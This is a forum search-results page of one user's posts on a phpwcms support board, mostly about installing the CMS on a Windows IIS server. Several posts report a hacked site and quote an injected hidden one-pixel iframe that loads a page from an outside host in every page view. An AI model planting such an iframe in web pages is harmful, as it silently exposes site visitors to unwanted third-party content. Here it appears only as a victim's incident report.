Search found 11 matches

by cczfury
Sat 20. Mar 2004, 00:08
Forum: phpwcms Support English
Topic: Spyware?!
Replies: 10
Views: 4337

..

DA**!

I have been locked out completely from receiving mail or connecting by FTP. The control panel is down :cry: I have contacted my hosting service, I hope they can resolve it.

By the way, what was in the main page, Pappnase? I find it weird that someone would hack into my website though... Plus ...
by cczfury
Fri 19. Mar 2004, 17:48
Forum: phpwcms Support English
Topic: Spyware?!
Replies: 10
Views: 4337

DRAT

All the PHP functionality in my host has been lost :shock:

All I get are errors each time a php page is loaded :oops:
Warning: mysql_pconnect(): Too many connections in /home/winarea/public_html/php/include/inc_lib/default.inc.php on line 25
Error while trying to connect to localhost
by cczfury
Fri 19. Mar 2004, 17:37
Forum: phpwcms Support English
Topic: Spyware?!
Replies: 10
Views: 4337

UPDATE

I just checked the index.php inside the FTP server and found the following:

<body<?php echo $content["body"] ?><IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>>



I hope this didn't come with Phpwcms :?, but it is now in my php code. The only other reason I can ...
by cczfury
Fri 19. Mar 2004, 17:07
Forum: phpwcms Support English
Topic: Spyware?!
Replies: 10
Views: 4337

Spyware?!

I don't know if it has anything to do, but now whenever I load a phpwcms PHP page my browser starts loading ****... I checked the source code and I found the following piece of code :o


<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

if you will check http://www ...
by cczfury
Sat 6. Dec 2003, 15:48
Forum: phpwcms Support English
Topic: Problem mit IIS 5.1
Replies: 25
Views: 11647

hmm

I have same problem as you. I use Windows 2000 Professional with IIS 5.0

Paths are not detected, yet permissions are all set. Also, you get errors when you try to post articles :(
by cczfury
Wed 26. Nov 2003, 18:37
Forum: phpwcms Support English
Topic: Updating content problems
Replies: 9
Views: 5436

oh cool

OK gonna try that now. Thanks!

EDIT: By the way, why would that work? My directory lies in http://80.35.134.109/proweb not only http://80.35.134.109 :S
by cczfury
Wed 26. Nov 2003, 18:09
Forum: phpwcms Support English
Topic: Updating content problems
Replies: 9
Views: 5436

This is the config.inc.php

This is the config.inc.php.

// phpwcms base values -> needed in any document

// database values
$phpwcms["db_host"] = "localhost";
$phpwcms["db_user"] = "root";
$phpwcms["db_pass"] = "EDITED";
$phpwcms["db_table"] = "phpwcms";
$phpwcms["db_prepend"] = "";
$phpwcms["db_pers"] = 1;

// site values ...
by cczfury
Tue 25. Nov 2003, 16:34
Forum: phpwcms Support English
Topic: Updating content problems
Replies: 9
Views: 5436

heh

Wait, you misunderstand. My PHP.ini file already has register_globals set to OFF

What I'm asking is how to set the file permissions to something that will work. Since it's my server I can't use my FTP manager to do so 8)
by cczfury
Mon 24. Nov 2003, 16:46
Forum: phpwcms Support English
Topic: Updating content problems
Replies: 9
Views: 5436

OK

How do I set up permissions in Windows 2000 Professional? I use my own computer as server... I right-clicked on the folder and clicked on Security and checked all the options, is that it?

http://80.35.134.109/proweb/index.php is blank- I don't think it's supposed to be like that.
by cczfury
Mon 24. Nov 2003, 16:44
Forum: phpwcms Support English
Topic: Is PHP.ini the root of all my evil? :(
Replies: 5
Views: 3074

Maybe this will help

; Print out errors (as a part of the output). For production web sites,
; you're strongly encouraged to turn this feature off, and use error logging
; instead (see below). Keeping display_errors enabled on a production web site
; may reveal security information to end users, such as file paths ...
by cczfury
Sun 23. Nov 2003, 10:52
Forum: phpwcms Support English
Topic: Updating content problems
Replies: 9
Views: 5436

Updating content problems

Hello,

I installed PHPWCMS yesterday in my Windows 2000 Professiona Web Server with IIS and everything ran smoothly until I finished installation- it said it couldn't detect any folders in the last step- and even if I changed the info it still couldn't. The access parameters were even set to let ...